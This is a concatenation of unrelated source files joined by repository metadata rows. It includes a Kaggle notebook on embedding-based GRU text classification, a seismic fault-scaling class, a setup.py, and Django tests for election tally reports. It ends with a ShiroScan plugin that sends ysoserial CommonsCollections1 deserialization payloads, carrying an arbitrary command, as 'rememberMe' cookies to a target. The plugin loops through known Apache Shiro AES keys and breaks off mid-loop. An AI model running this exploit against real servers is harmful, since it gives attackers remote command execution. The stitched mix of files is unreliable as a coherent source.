## some config values
embed_size = 300 # how big is each word vector
max_features = 50000 # how many unique words to use (i.e num rows in embedding vector)
maxlen = 100 # max number of words in a question to use
## fill up the missing values
train_X = train_df["question_text"].fillna("_na_").values
val_X = val_df["question_text"].fillna("_na_").values
test_X = test_df["question_text"].fillna("_na_").values
## Tokenize the sentences
tokenizer = Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(list(train_X))
train_X = tokenizer.texts_to_sequences(train_X)
val_X = tokenizer.texts_to_sequences(val_X)
test_X = tokenizer.texts_to_sequences(test_X)
## Pad the sentences
train_X = pad_sequences(train_X, maxlen=maxlen)
val_X = pad_sequences(val_X, maxlen=maxlen)
test_X = pad_sequences(test_X, maxlen=maxlen)
## Get the target values
train_y = train_df['target'].values
val_y = val_df['target'].values
# **Without Pretrained Embeddings:**
#
# Now that we are done with all the necessary preprocessing steps, we can first train a Bidirectional GRU model. We will not use any pre-trained word embeddings for this model and the embeddings will be learnt from scratch. Please check out the model summary for the details of the layers used.
# In[ ]:
inp = Input(shape=(maxlen,))
x = Embedding(max_features, embed_size)(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print(model.summary())
# Train the model using train sample and monitor the metric on the valid sample. This is just a sample model running for 2 epochs. Changing the epochs, batch_size and model parameters might give us a better model.
# In[ ]:
## Train the model
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# Now let us get the validation sample predictions and also get the best threshold for F1 score.
# In[ ]:
pred_noemb_val_y = model.predict([val_X], batch_size=1024, verbose=1)
for thresh in np.arange(0.1, 0.501, 0.01):
thresh = np.round(thresh, 2)
print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_noemb_val_y>thresh).astype(int))))
# Now let us get the test set predictions as well and save them
# In[ ]:
pred_noemb_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# Now that our model building is done, it might be a good idea to clean up some memory before we go to the next step.
# In[ ]:
del model, inp, x
import gc; gc.collect()
time.sleep(10)
# So we got some baseline GRU model without pre-trained embeddings. Now let us use the provided embeddings and rebuild the model again to see the performance.
#
#
# In[ ]:
# We have four different types of embeddings.
# * GoogleNews-vectors-negative300 - https://code.google.com/archive/p/word2vec/
# * glove.840B.300d - https://nlp.stanford.edu/projects/glove/
# * paragram_300_sl999 - https://cogcomp.org/page/resource_view/106
# * wiki-news-300d-1M - https://fasttext.cc/docs/en/english-vectors.html
#
# A very good explanation for different types of embeddings are given in this [kernel](https://www.kaggle.com/sbongo/do-pretrained-embeddings-give-you-the-extra-edge). Please refer the same for more details..
#
# **Glove Embeddings:**
#
# In this section, let us use the Glove embeddings and rebuild the GRU model.
# In[ ]:
EMBEDDING_FILE = '../input/embeddings/glove.840B.300d/glove.840B.300d.txt'
def get_coefs(word,*arr): return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.split(" ")) for o in open(EMBEDDING_FILE))
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
if i >= max_features: continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None: embedding_matrix[i] = embedding_vector
inp = Input(shape=(maxlen,))
x = Embedding(max_features, embed_size, weights=[embedding_matrix])(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print(model.summary())
# In[ ]:
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# In[ ]:
pred_glove_val_y = model.predict([val_X], batch_size=1024, verbose=1)
for thresh in np.arange(0.1, 0.501, 0.01):
thresh = np.round(thresh, 2)
print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_glove_val_y>thresh).astype(int))))
# Results seem to be better than the model without pretrained embeddings.
# In[ ]:
pred_glove_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# In[ ]:
del word_index, embeddings_index, all_embs, embedding_matrix, model, inp, x
import gc; gc.collect()
time.sleep(10)
# **Wiki News FastText Embeddings:**
#
# Now let us use the FastText embeddings trained on Wiki News corpus in place of Glove embeddings and rebuild the model.
# In[ ]:
EMBEDDING_FILE = '../input/embeddings/wiki-news-300d-1M/wiki-news-300d-1M.vec'
def get_coefs(word,*arr): return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.split(" ")) for o in open(EMBEDDING_FILE) if len(o)>100)
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
if i >= max_features: continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None: embedding_matrix[i] = embedding_vector
inp = Input(shape=(maxlen,))
x = Embedding(max_features, embed_size, weights=[embedding_matrix])(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# In[ ]:
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# In[ ]:
pred_fasttext_val_y = model.predict([val_X], batch_size=1024, verbose=1)
for thresh in np.arange(0.1, 0.501, 0.01):
thresh = np.round(thresh, 2)
print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_fasttext_val_y>thresh).astype(int))))
# In[ ]:
pred_fasttext_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# In[ ]:
del word_index, embeddings_index, all_embs, embedding_matrix, model, inp, x
import gc; gc.collect()
time.sleep(10)
# **Paragram Embeddings:**
#
# In this section, we can use the paragram embeddings and build the model and make predictions.
# In[ ]:
EMBEDDING_FILE = '../input/embeddings/paragram_300_sl999/paragram_300_sl999.txt'
def get_coefs(word,*arr): return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.split(" ")) for o in open(EMBEDDING_FILE, encoding="utf8", errors='ignore') if len(o)>100)
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
if i >= max_features: continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None: embedding_matrix[i] = embedding_vector
inp = Input(shape=(maxlen,))
x = Embedding(max_features, embed_size, weights=[embedding_matrix])(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# In[ ]:
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# In[ ]:
pred_paragram_val_y = model.predict([val_X], batch_size=1024, verbose=1)
for thresh in np.arange(0.1, 0.501, 0.01):
thresh = np.round(thresh, 2)
print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_paragram_val_y>thresh).astype(int))))
# In[ ]:
pred_paragram_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# In[ ]:
del word_index, embeddings_index, all_embs, embedding_matrix, model, inp, x
import gc; gc.collect()
time.sleep(10)
# **Observations:**
# * Overall pretrained embeddings seem to give better results comapred to non-pretrained model.
# * The performance of the different pretrained embeddings are almost similar.
#
# **Final Blend:**
#
# Though the results of the models with different pre-trained embeddings are similar, there is a good chance that they might capture different type of information from the data. So let us do a blend of these three models by averaging their predictions.
# In[ ]:
pred_val_y = 0.33*pred_glove_val_y + 0.33*pred_fasttext_val_y + 0.34*pred_paragram_val_y
for thresh in np.arange(0.1, 0.501, 0.01):
thresh = np.round(thresh, 2)
print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_val_y>thresh).astype(int))))
# The result seems to better than individual pre-trained models and so we let us create a submission file using this model blend.
# In[ ]:
pred_test_y = 0.33*pred_glove_test_y + 0.33*pred_fasttext_test_y + 0.34*pred_paragram_test_y
pred_test_y = (pred_test_y>0.35).astype(int)
out_df = pd.DataFrame({"qid":test_df["qid"].values})
out_df['prediction'] = pred_test_y
out_df.to_csv("submission.csv", index=False)
#
# **References:**
#
# Thanks to the below kernels which helped me with this one.
# 1. https://www.kaggle.com/jhoward/improved-lstm-baseline-glove-dropout
# 2. https://www.kaggle.com/sbongo/do-pretrained-embeddings-give-you-the-extra-edge
| [
"mccusker@gmail.com"
] | mccusker@gmail.com |
c4a2ffc18cb1fc769f67c2786359e8a28b139dc5 | 52aaf609fe3e5e03eb8040ae4e884d511dc2cfd0 | /source_models/utils/scaling.py | 6928070599df027a33965883e536b5429f5a329d | [] | no_license | GeoscienceAustralia/NSHA2018 | f2b140d142b5140893e20a946ed9a545c32e2749 | 86a3af0b52fe51470754291700f9a985b5177e2a | refs/heads/master | 2021-07-06T22:36:21.213958 | 2021-06-28T07:12:02 | 2021-06-28T07:12:02 | 55,460,974 | 7 | 5 | null | 2017-02-06T11:55:30 | 2016-04-05T02:23:03 | Jupyter Notebook | UTF-8 | Python | false | false | 2,058 | py | """Implement other iterations of Leonard 2014 scaling
Reference: Leonard, M., 2014. Self-consistent earthquake fault-scaling relations:
Update and extension to stable continental strike-slip faults.
Bulletin of the Seismological Society of America, 104(6), pp 2953-2965.
Jonathan Griffin
Geoscience Australia May 2018
"""
from numpy import power, log10
from openquake.hazardlib.scalerel import Leonard2014_SCR
class Leonard2014_SCR_extension(Leonard2014_SCR):
"""
Leonard, M., 2014. Self-consistent earthquake fault-scaling relations:
Update and extension to stable continental strike-slip faults.
Bulletin of the Seismological Society of America, 104(6), pp 2953-2965.
Extends OpenQuake implementation to include
length and width based scaling relationships (not just area and moment).
"""
def get_width_from_length(self, length, rake):
if (-45 <= rake <= 45) or (rake >= 135) or (rake <= -135):
# strike-slip
if length <=1600:
return power(10,(1.0*log10(length)))
elif length > 1600 and length <= 70000:
return power(10,(1.068 + 0.667*log10(length)))
else:
return power(10,4.298)
else:
# Dip-slip (thrust or normal)
if length <= 2500:
return power(10, (1.0 + 1.0*log10(length)))
else:
return power(10, (1.130 + 0.667*log10(length)))
def get_width_from_area(self, area, rake):
if (-45 <= rake <= 45) or (rake >= 135) or (rake <= -135):
# strike-slip
if area <=2.56e6:
return power(10, (0.5*log10(area)))
elif area > 2.56e6 and area < 1400e6:
return power(10,(0.641 + 0.4*log10(area)))
else:
return power(10,4.298)
else:
# Dip-slip (thrust or normal)
if area <= 6.2e6:
return power(10, (0.5*log10(area)))
else:
return power(10, (0.678 + 0.4*log10(area)))
| [
"jono.d.griffin@gmail.com"
] | jono.d.griffin@gmail.com |
488d63b40c3dcea25f5d7e286580017fcfa026c0 | 09da1266eb3fb02ab0b62ab46b002fd9c35df881 | /setup.py | 7ed5f412036a31c8d55d3e08a9c7fb9f6ccce25b | [] | no_license | ixalon/run-if-ssm | e0baca2dd2480a8d3c0c733c677ef1ffe0633ebd | 4e1580b325fb371488ebf8653689b78231198537 | refs/heads/master | 2020-03-27T23:22:24.509919 | 2018-09-04T08:26:51 | 2018-09-04T09:13:39 | 147,313,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | from setuptools import setup
import os
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="run-if-ssm",
version="1.0.0",
author="Chris Warren",
author_email="chris@ixalon.com",
description=("A command line utility for running commands if a AWS SSM parameter is set."),
license="BSD",
keywords="aws",
url="https://github.com/ixalon/run-if-ssm",
install_requires=[
'boto3',
'argh',
],
scripts=['bin/run-if-ssm'],
long_description=read('README.md'),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: OSI Approved :: BSD License",
],
)
| [
"chris@ixalon.net"
] | chris@ixalon.net |
ed66afc6b66bb066763ac8e3bfe8202fffbd4239 | 9c61ec2a55e897e4a3bb9145296081c648d812c4 | /docs/cd/06443007็จๅผ็ขผ/ch10/10-7.py | 12e0599c6cd9b2461a1e86381e5859ddb809a4da | [] | no_license | wildboy2arthur/ML-Class | 47899246251d12972a6d3875160c1cc8d1052202 | 345c86e3f8890919d59a63a79674acbdcd4577c4 | refs/heads/main | 2023-07-16T11:32:07.683652 | 2021-08-24T08:25:04 | 2021-08-24T08:25:04 | 399,388,026 | 0 | 0 | null | 2021-08-24T08:18:36 | 2021-08-24T08:18:35 | null | UTF-8 | Python | false | false | 74 | py | sns.scatterplot(x='mean radius', y='mean texture', data=df, hue='target'); | [
"1101404110@nkust.edu.tw"
] | 1101404110@nkust.edu.tw |
adbf4a84f7adec9c8567c5ed02472d79eadbf189 | 1c4d1333ccd1a8ad6c299071ca723c1a5141f6b1 | /venv/bin/pyrsa-priv2pub | 73ac3cc28dd92db2bb8ec314911e986c33be1031 | [] | no_license | ParnikaS/DoxperAPITesting | 6bf5bb6710dbbf13a876e130ace89977b7eedfcb | d0fad52bc559c0b2ade2e563b99cff562cbe1475 | refs/heads/master | 2020-03-18T14:36:31.728044 | 2018-05-25T13:19:36 | 2018-05-25T13:19:36 | 134,856,857 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | #!/Users/parnikasharma/PycharmProjects/ApiTesting/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from rsa.util import private_to_public
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(private_to_public())
| [
"parnikasharma@Abhisheks-MacBook-Air.local"
] | parnikasharma@Abhisheks-MacBook-Air.local | |
3ec63c24410051f8a1dc64905bbeb91ff0b787ea | 4839df5ce210b0d2d74a67677a2ec3d4faacf74d | /tally_ho/apps/tally/tests/views/reports/test_administrative_areas_reports.py | 4bc221d7f49dadf7c0978dcd26137ff7772fdb3b | [
"Apache-2.0"
] | permissive | hashem92/tally-ho | 5bf7f8f30804362ccf862d5d9a920bb1ce4bb17b | f1667a5dbef808f37c8717ebfacf53499333370c | refs/heads/master | 2023-05-05T08:01:14.968280 | 2020-11-05T13:48:21 | 2020-11-05T13:48:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,634 | py | from django.test import RequestFactory
from tally_ho.libs.permissions import groups
from tally_ho.apps.tally.models.sub_constituency import SubConstituency
from tally_ho.apps.tally.views.reports import administrative_areas_reports
from tally_ho.libs.tests.test_base import create_result_form,\
create_station, create_reconciliation_form, create_tally,\
create_center, create_region, create_constituency, create_office, TestBase
class TestAdministrativeAreasReports(TestBase):
def setUp(self):
self.factory = RequestFactory()
self._create_permission_groups()
self._create_and_login_user()
self._add_user_to_group(self.user, groups.TALLY_MANAGER)
self.tally = create_tally()
self.tally.users.add(self.user)
region = create_region(tally=self.tally)
office = create_office(tally=self.tally, region=region)
constituency = create_constituency(tally=self.tally)
sc, _ = SubConstituency.objects.get_or_create(code=1, field_office='1')
center = create_center(tally=self.tally,
sub_constituency=sc,
constituency=constituency)
station = create_station(center=center, registrants=20)
result_form = create_result_form(
tally=self.tally,
office=office,
center=center,
station_number=station.station_number)
create_reconciliation_form(
result_form=result_form,
user=self.user,
number_ballots_inside_box=20,
number_cancelled_ballots=0,
number_spoiled_ballots=0,
number_unstamped_ballots=0,
number_unused_ballots=0,
number_valid_votes=20,
number_invalid_votes=0,
number_ballots_received=20,
)
def test_regions_reports(self):
"""
Test that the region reports are rendered as expected.
"""
request = self._get_request()
view = administrative_areas_reports.RegionsReportsView.as_view()
request = self.factory.get('/reports-regions')
request.user = self.user
response = view(
request,
tally_id=self.tally.pk,
group_name=groups.TALLY_MANAGER)
regions_turnout_report =\
administrative_areas_reports.generate_voters_turnout_report(
self.tally.id, 'result_form__office__region__name')[0]
self.assertContains(response, "<h1>Region Reports</h1>")
# Region turnout report tests
self.assertContains(response, "<h3>Turn Out Report</h3>")
self.assertContains(response, "<th>Region Name</th>")
self.assertContains(response, "<th>Total number of voters</th>")
self.assertContains(response, "<th>Number of voters voted</th>")
self.assertContains(response, "<th>Male voters</th>")
self.assertContains(response, "<th>Female voters</th>")
self.assertContains(response, "<th>Turnout percentage</th>")
self.assertContains(
response,
f'<td>{regions_turnout_report["name"]}</td>')
self.assertContains(
response,
f'<td>{regions_turnout_report["number_of_voters_voted"]}</td>')
self.assertContains(
response,
str('<td>'
f'{regions_turnout_report["total_number_of_registrants"]}'
'</td>'))
self.assertContains(
response,
str('<td>'
f'{regions_turnout_report["total_number_of_ballots_used"]}'
'</td>'))
self.assertContains(
response,
f'<td>{regions_turnout_report["male_voters"]}</td>')
self.assertContains(
response,
f'<td>{regions_turnout_report["female_voters"]}</td>')
self.assertContains(
response,
f'<td>{regions_turnout_report["turnout_percentage"]} %</td>')
votes_summary_report =\
administrative_areas_reports.generate_votes_summary_report(
self.tally.id, 'result_form__office__region__name')[0]
# Region votes summary report tests
self.assertContains(response, "<h3>Votes Summary Report</h3>")
self.assertContains(response, "<th>Region Name</th>")
self.assertContains(response, "<th>Total number of valid votes</th>")
self.assertContains(response, "<th>Total number of invalid votes</th>")
self.assertContains(
response, "<th>Total number of cancelled votes</th>")
self.assertContains(
response,
f'<td>{votes_summary_report["name"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_valid_votes"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_invalid_votes"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_cancelled_ballots"]}</td>')
def test_constituency_reports(self):
"""
Test that the constituency reports are rendered as expected.
"""
request = self._get_request()
view = administrative_areas_reports.ConstituencyReportsView.as_view()
request = self.factory.get('/reports-constituencies')
request.user = self.user
response = view(
request,
tally_id=self.tally.pk,
group_name=groups.TALLY_MANAGER)
turnout_report =\
administrative_areas_reports.generate_voters_turnout_report(
self.tally.id, 'result_form__center__constituency__name')[0]
self.assertContains(response, "<h1>Constituency Reports</h1>")
# Constituency turnout report tests
self.assertContains(response, "<h3>Turn Out Report</h3>")
self.assertContains(response, "<th>Constituency Name</th>")
self.assertContains(response, "<th>Total number of voters</th>")
self.assertContains(response, "<th>Number of voters voted</th>")
self.assertContains(response, "<th>Male voters</th>")
self.assertContains(response, "<th>Female voters</th>")
self.assertContains(response, "<th>Turnout percentage</th>")
self.assertContains(
response,
f'<td>{turnout_report["name"]}</td>')
self.assertContains(
response,
f'<td>{turnout_report["number_of_voters_voted"]}</td>')
self.assertContains(
response,
str('<td>'
f'{turnout_report["total_number_of_registrants"]}'
'</td>'))
self.assertContains(
response,
str('<td>'
f'{turnout_report["total_number_of_ballots_used"]}'
'</td>'))
self.assertContains(
response,
f'<td>{turnout_report["male_voters"]}</td>')
self.assertContains(
response,
f'<td>{turnout_report["female_voters"]}</td>')
self.assertContains(
response,
f'<td>{turnout_report["turnout_percentage"]} %</td>')
votes_summary_report =\
administrative_areas_reports.generate_votes_summary_report(
self.tally.id, 'result_form__center__constituency__name')[0]
# Constituency votes summary report tests
self.assertContains(response, "<h3>Votes Summary Report</h3>")
self.assertContains(response, "<th>Constituency Name</th>")
self.assertContains(response, "<th>Total number of valid votes</th>")
self.assertContains(response, "<th>Total number of invalid votes</th>")
self.assertContains(
response, "<th>Total number of cancelled votes</th>")
self.assertContains(
response,
f'<td>{votes_summary_report["name"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_valid_votes"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_invalid_votes"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_cancelled_ballots"]}</td>')
def test_sub_constituency_reports(self):
"""
Test that the sub constituency reports are rendered as expected.
"""
request = self._get_request()
view =\
administrative_areas_reports.SubConstituencyReportsView.as_view()
request = self.factory.get('/reports-sub-constituencies')
request.user = self.user
response = view(
request,
tally_id=self.tally.pk,
group_name=groups.TALLY_MANAGER)
turnout_report =\
administrative_areas_reports.generate_voters_turnout_report(
self.tally.id,
'result_form__center__sub_constituency__code')[0]
self.assertContains(response, "<h1>Sub Constituency Reports</h1>")
# Sub Constituency turnout report tests
self.assertContains(response, "<h3>Turn Out Report</h3>")
self.assertContains(response, "<th>Sub Constituency Name</th>")
self.assertContains(response, "<th>Total number of voters</th>")
self.assertContains(response, "<th>Number of voters voted</th>")
self.assertContains(response, "<th>Male voters</th>")
self.assertContains(response, "<th>Female voters</th>")
self.assertContains(response, "<th>Turnout percentage</th>")
self.assertContains(
response,
f'<td>{turnout_report["name"]}</td>')
self.assertContains(
response,
f'<td>{turnout_report["number_of_voters_voted"]}</td>')
self.assertContains(
response,
str('<td>'
f'{turnout_report["total_number_of_registrants"]}'
'</td>'))
self.assertContains(
response,
str('<td>'
f'{turnout_report["total_number_of_ballots_used"]}'
'</td>'))
self.assertContains(
response,
f'<td>{turnout_report["male_voters"]}</td>')
self.assertContains(
response,
f'<td>{turnout_report["female_voters"]}</td>')
self.assertContains(
response,
f'<td>{turnout_report["turnout_percentage"]} %</td>')
votes_summary_report =\
administrative_areas_reports.generate_votes_summary_report(
self.tally.id,
'result_form__center__sub_constituency__code')[0]
# Sub Constituency votes summary report tests
self.assertContains(response, "<h3>Votes Summary Report</h3>")
self.assertContains(response, "<th>Sub Constituency Name</th>")
self.assertContains(response, "<th>Total number of valid votes</th>")
self.assertContains(response, "<th>Total number of invalid votes</th>")
self.assertContains(
response, "<th>Total number of cancelled votes</th>")
self.assertContains(
response,
f'<td>{votes_summary_report["name"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_valid_votes"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_invalid_votes"]}</td>')
self.assertContains(
response,
f'<td>{votes_summary_report["number_cancelled_ballots"]}</td>')
| [
"jmwashuma@live.com"
] | jmwashuma@live.com |
7e13a86247f31bdea66a73b542bf5fc8b7f875d4 | 7ab40a447bc1b82f3c6104fc1349fd9360629dd1 | /moule/plugins/CommonsCollections1.py | c9d78eb386369b0b97b8600d9cef6b530a7f257a | [] | no_license | 3ecurity/ShiroScan | 48a5feb8a4bfe87803769f480c8ca12d96413ca5 | c7bb0df849b3be9e09e4b2966d66f67f98d0df5d | refs/heads/master | 2021-03-26T19:06:44.736417 | 2020-03-16T17:14:35 | 2020-03-16T17:14:35 | 247,739,237 | 0 | 0 | null | 2020-03-16T15:07:53 | 2020-03-16T15:07:52 | null | UTF-8 | Python | false | false | 31,348 | py | # -*- coding: utf-8 -*-
# By ๆฏๆbeast svenbeast.com
import os
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES
from ..main import Idea
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
JAR_FILE = 'moule/ysoserial.jar'
@Idea.plugin_register('Class2:CommonsCollections1')
class CommonsCollections1(object):
def process(self,url,command):
self.poc(url,command)
def poc(self,url, command):
target = url
try:
# ็ฎๆ ๆบๆง่ก็ไปฃ็
payload = self.generator(command, JAR_FILE) # ็ๆpayload
r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ1
#print("payload1ๅทฒๅฎๆ,ๅญๆฎตrememberMe:็้่ฆ่ชๅทฑๅฐๆบไปฃ็ print "+payload.decode())
if(r.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key1:kPH+bIxk5D2deZiIxcaaaA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key1:kPH+bIxk5D2deZiIxcaaaA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r.status_code))
payload2 = self.generator2(command, JAR_FILE) # ็ๆpayload2
r2 = requests.get(target, cookies={'rememberMe': payload2.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ2
if(r2.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key2:wGiHplamyXlVB11UXWol8g== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r2.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key2:wGiHplamyXlVB11UXWol8g== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r2.status_code))
payload3 = self.generator3(command, JAR_FILE) # ็ๆpayload3
r3 = requests.get(target, cookies={'rememberMe': payload3.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ3
if(r3.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key3:2AvVhdsgUs0FSA3SDFAdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r3.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key3:2AvVhdsgUs0FSA3SDFAdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r3.status_code))
payload4 = self.generator4(command, JAR_FILE) # ็ๆpayload4
r4 = requests.get(target, cookies={'rememberMe': payload4.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ4
if(r4.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key4:4AvVhmFLUs0KTA3Kprsdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r4.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key4:4AvVhmFLUs0KTA3Kprsdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r4.status_code))
payload5 = self.generator5(command, JAR_FILE) # ็ๆpayload5
r5 = requests.get(target, cookies={'rememberMe': payload5.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ5
if(r5.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key5:3AvVhmFLUs0KTA3Kprsdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r5.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key5:3AvVhmFLUs0KTA3Kprsdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r5.status_code))
payload6 = self.generator6(command, JAR_FILE) # ็ๆpayload6
r6 = requests.get(target, cookies={'rememberMe': payload6.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ6
if(r6.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key6:Z3VucwAAAAAAAAAAAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r6.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key6:Z3VucwAAAAAAAAAAAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r6.status_code))
payload7 = self.generator7(command, JAR_FILE) # ็ๆpayload7
r7 = requests.get(target, cookies={'rememberMe': payload7.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ2
if(r7.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key7:U3ByaW5nQmxhZGUAAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r7.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key7:U3ByaW5nQmxhZGUAAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r7.status_code))
payload8 = self.generator8(command, JAR_FILE) # ็ๆpayload8
r8 = requests.get(target, cookies={'rememberMe': payload8.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ8
if(r8.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key8:wGiHplamyXlVB11UXWol8g== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r8.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key8:wGiHplamyXlVB11UXWol8g== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r8.status_code))
payload9 = self.generator9(command, JAR_FILE) # ็ๆpayload9
r9 = requests.get(target, cookies={'rememberMe': payload9.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ9
if(r9.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key9:6ZmI6I2j5Y+R5aSn5ZOlAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r9.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key9:6ZmI6I2j5Y+R5aSn5ZOlAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r9.status_code))
#ๅ็็บฟ
#ๅ่กฅ็ผ็
payload100 = self.generator100(command, JAR_FILE) # ็ๆpayload100
r100 = requests.get(target, cookies={'rememberMe': payload100.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ100
if(r100.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key10:fCq+/xW488hMTCD+cmJ3aQ== ๅทฒๆๅๅ้๏ผ")
